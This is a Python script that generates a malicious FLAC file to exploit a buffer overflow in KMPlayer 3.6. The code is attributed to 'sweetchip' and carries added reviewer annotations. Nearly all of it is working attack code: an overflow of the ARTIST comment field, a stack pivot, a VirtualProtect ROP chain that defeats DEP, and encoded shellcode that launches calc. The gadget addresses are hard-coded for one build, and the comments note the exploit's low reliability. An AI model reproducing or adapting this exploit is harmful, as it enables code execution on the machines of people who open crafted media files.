
KMPlayer 3.6 exploit

from __future__ import print_function

import struct
import sys
import time
from socket import *  # socket/sys/time are not used by the generator; kept as in the paste
  5.  
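"""
Kmplayer 3.6 Buffer Overflow exploit
*Very* Low Reliablity :I
By sweetchip

Reviewer notes (derived from the byte layout below, not from the target):

* The script writes a minimal .flac: "fLaC" + STREAMINFO, then a
  VORBIS_COMMENT block whose only entry is a huge "ARTIST=..." string,
  then a PADDING block.
* The ARTIST value overflows a buffer in KMPlayer 3.6's FLAC handling
  (the paste calls it a BOF; the pivot gadget lives in bass_flac.dll) and
  pivots ESP into one of seven 64 KiB copies of "stage1" = filler + ROP
  chain + shellcode.
* The ROP chain follows mona.py's VirtualProtect() template with gadgets
  from PProcDLL.dll / bass.dll / bass_wv.dll, then returns into an
  x86/alpha_mixed-encoded payload that starts calc.

Every address is hard-coded for one KMPlayer 3.6 build on one Windows
image (the 0x7d7xxxxx values sit outside the named DLLs and look
OS-specific), hence the author's "very low reliability".  The output is a
malicious file: generate and open it only inside an isolated,
non-networked lab VM.

The payload is assembled as bytes and written in binary mode, so the
generator runs unchanged on Python 2 and 3.
"""

filename = "Exploit_bypass_ASLR_DEP.flac"

# --- FLAC container pieces -------------------------------------------------
# "fLaC" marker, the STREAMINFO block (header 00 00 00 22 = type 0, 34 bytes)
# and the first byte (0x04, which reads as the VORBIS_COMMENT type) of the
# next block header; build_flac() supplies that block's 24-bit length.
HEAD1 = (b"\x66\x4C\x61\x43\x00\x00\x00\x22\x10\x00\x10\x00\x00\x0B\x3E\x00\x2E"
         b"\x50\x0B\xB8\x02\xF0\x00\x91\x57\x93\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"
         b"\x6B\x80\x38\x24\x7A\xBC\x64\x5A\x04")

# Remainder of the VORBIS_COMMENT body: together with the trailing 0x00 of the
# length field this reads as vendor_length = 0 and user_comment_list_length = 1
# (both little-endian) -- the single comment is the ARTIST entry.
HEAD2 = b"\x00\x00\x00\x01\x00\x00\x00"

# Final block header: 0x81 reads as last-block flag | PADDING, length 0x00A446.
END_OF_HEAD = b"\x81\x00\xA4\x46"

# --- shellcode -------------------------------------------------------------
# cmd = calc
# encoder - x86/alpha_mixed (starts with PUSH ESP / POP ECX, the usual
# BufferRegister prologue, so it expects to be entered with ESP on itself)
SHELLCODE = (b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
             b"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
             b"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
             b"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
             b"\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
             b"\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
             b"\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
             b"\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
             b"\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
             b"\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
             b"\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
             b"\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
             b"\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
             b"\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
             b"\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
             b"\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
             b"\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
             b"\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
             b"\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
             b"\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
             b"\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
             b"\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
             b"\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
             b"\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
             b"\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
             b"\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
             b"\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
             b"\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
             b"\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
             b"\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
             b"\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
             b"\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")

# --- layout constants ------------------------------------------------------
STAGE1_FILLER = 3028      # "C" bytes in front of the ROP chain
SLOT_SIZE = 65536         # each stage1 copy is padded to one 64 KiB slot
STAGE1_COPIES = 7
TRAILING_PADDING = 118000  # zero bytes after the PADDING block header


def _dword(value):
    """Pack *value* as a little-endian 32-bit unsigned int (one ROP slot)."""
    return struct.pack('<I', value)


def build_rop_chain():
    """Return the VirtualProtect() ROP chain as bytes.

    Gadget addresses and annotations are mona.py (corelan) output for the
    PProcDLL.dll / bass.dll / bass_wv.dll shipped with KMPlayer 3.6.  The
    layout is mona's PUSHAD template: after ``PUSHAD # RETN`` the stack holds
    EDI (ROP nop), ESI (&VirtualProtect), EBP (``PUSH ESP # RETN`` = return
    into the stack), ESP (lpAddress, pushed by PUSHAD itself), EBX (dwSize),
    EDX (flNewProtect), ECX (lpflOldProtect) and EAX.
    """
    chain = [
        _dword(0x10064b1f),  # XCHG EAX,ESP # RETN            [PProcDLL.dll]  (stack pivot)
        _dword(0x10126c47),  # POP EAX # RETN                 [PProcDLL.dll]
        _dword(0x11047e74),  # -> EAX: ptr to &VirtualProtect() [IAT bass.dll] (paste's note;
                             #    the ADD/INC gadgets below move EAX before it is dereferenced)
        _dword(0x11024559),  # ADD EAX,10B0 # RETN 0x04       [bass.dll]
        _dword(0x11024559),  # ADD EAX,10B0 # RETN 0x04       [bass.dll]
        b"DEAD",             # marker dwords: each RETN 0x04 skips the slot after the next gadget
        _dword(0x11024559),  # ADD EAX,10B0 # RETN 0x04       [bass.dll]
        b"BEEF",
        _dword(0x11024559),  # ADD EAX,10B0 # RETN 0x04       [bass.dll]
        b"SWEE",
    ]
    # 337 x (INC EAX # RETN) [PProcDLL.dll] -- fine-tunes EAX without non-ASCII bytes
    chain.append(_dword(0x10120637) * 337)
    chain += [
        _dword(0x11022f69),  # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]  -> EAX = VirtualProtect
        _dword(0x11033e30),  # XCHG EAX,ESI # RETN            [bass.dll]     -> ESI = VirtualProtect
        _dword(0x10060210),  # POP EBP # RETN                 [PProcDLL.dll]
        _dword(0x10146f65),  # -> EBP: PUSH ESP # RETN        [PProcDLL.dll] (return address)
        _dword(0x11010754),  # POP EBX # RETN                 [bass.dll]
        _dword(0x00005050),  # -> EBX: dwSize.  The paste annotates this "0x00000201" (mona's
                             #    default); the packed value is 0x5050, kept ASCII-only ("PP").
        _dword(0x10126623),  # POP EDX # RETN                 [PProcDLL.dll]
        _dword(0x00000040),  # -> EDX: flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE)
        _dword(0x1013555c),  # POP ECX # RETN                 [PProcDLL.dll]
        _dword(0x7d782020),  # -> ECX: writable location for lpflOldProtect (OS-specific address)
        _dword(0x10120b13),  # POP EDI # RETN                 [PProcDLL.dll]
        _dword(0x100d0240),  # -> EDI: RETN (ROP NOP)          [bass_wv.dll]
        _dword(0x10126c47),  # POP EAX # RETN                 [PProcDLL.dll]
        _dword(0x44444444),  # -> EAX: "DDDD"; presumably executed as INC ESP x4 once the
                             #    PUSH ESP # RETN lands here, falling through into the shellcode
        _dword(0x1001442e),  # PUSHAD # RETN                  [PProcDLL.dll] -> VirtualProtect()
    ]
    return b"".join(chain)


def build_stage1():
    """Return filler + ROP chain + shellcode (the unit copied into each slot)."""
    return b"C" * STAGE1_FILLER + build_rop_chain() + SHELLCODE


def build_artist():
    """Return the oversized ARTIST= comment value that triggers the overflow.

    Layout: 200,000 bytes of filler carrying the overwritten return address
    and the ``POP ESP # RETN`` pivot, then seven 64 KiB slots each starting
    with stage1, then 100,000 bytes of trailing filler.

    Raises:
        ValueError: if stage1 no longer fits in one slot (the paste would
            silently emit a negative-length pad, i.e. an empty string).
    """
    stage1 = build_stage1()
    if len(stage1) > SLOT_SIZE:
        raise ValueError("stage1 (%d bytes) exceeds the %d-byte slot"
                         % (len(stage1), SLOT_SIZE))

    parts = [
        b"ARTIST=",
        b"A" * 60000,
        b"A" * 4848,
        _dword(0x7d79192c),  # overwritten control value (OS-specific address, see module docstring)
        b"A" * 137,
        _dword(0x10402f0f),  # POP ESP # RETN [bass_flac.dll] -- pivots ESP to the next dword
        _dword(0x7d791930),  # new ESP.  The paste's comment says "ptr to 7d761930"; the packed
                             # value is 0x7d791930 -- trust the value, not the comment.
        b"B" * (140000 - 4848 - 4 - 4 - 4 - 137),
    ]
    # Seven copies, each padded to exactly one slot -- presumably so the pivoted
    # ESP hits a chain whatever the exact offset turns out to be (TODO confirm).
    slot = stage1 + b"Z" * (SLOT_SIZE - len(stage1))
    parts.append(slot * STAGE1_COPIES)
    # The paste reads `sartist += "A" * 100000`, an undefined name that raises
    # NameError before anything is written.  Read here as a typo for `artist`;
    # the comment length is computed afterwards, so either reading is
    # self-consistent -- confirm against a working copy if the layout matters.
    parts.append(b"A" * 100000)
    return b"".join(parts)


def build_flac():
    """Return the complete .flac file contents as bytes.

    Raises:
        ValueError: if the VORBIS_COMMENT block would not fit its 24-bit
            length field.
    """
    artist = build_artist()
    artist_len = _dword(len(artist))
    # The paste sizes the block as head2 + end-of-head + length field + value.
    block_len = len(HEAD2) + len(END_OF_HEAD) + len(artist_len) + len(artist)
    if block_len >= 1 << 24:
        raise ValueError("metadata block too large for a 24-bit length: %d" % block_len)
    # '>I' of (len * 256): the upper three bytes are the big-endian 24-bit block
    # length, the trailing 0x00 is the first byte of vendor_length (see HEAD2).
    payload_len = struct.pack('>I', block_len * 256)

    return b"".join([
        HEAD1,
        payload_len,
        HEAD2,
        artist_len,
        artist,
        END_OF_HEAD,
        b"\x00" * TRAILING_PADDING,
    ])


def write_flac(path, data):
    """Write *data* to *path* in binary mode (text mode would mangle 0x0A bytes on Windows)."""
    with open(path, 'wb') as fh:
        fh.write(data)


try:                    # Python 2
    _prompt = raw_input
except NameError:       # Python 3
    _prompt = input


def main():
    """Print the banner, build the file, write it and wait for Enter as the paste did."""
    print("\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only")
    print("[*] Author : sweetchip | 2013.04.18\n")
    print("[*] Public Release Date : 2015.11.12")

    print("\n[*] Generating Flac file.....")
    exploit = build_flac()
    print("[ ] Payload size :", len(exploit))
    print("[ ] Shellcode size :", len(SHELLCODE), "\n")

    write_flac(filename, exploit)

    print("[*] Malicious File generated Successfully!!!")
    print("[ ] file name : " + filename)

    _prompt("\npress enter to continue :D . . . . .")


if __name__ == "__main__":
    main()
#End OF Source.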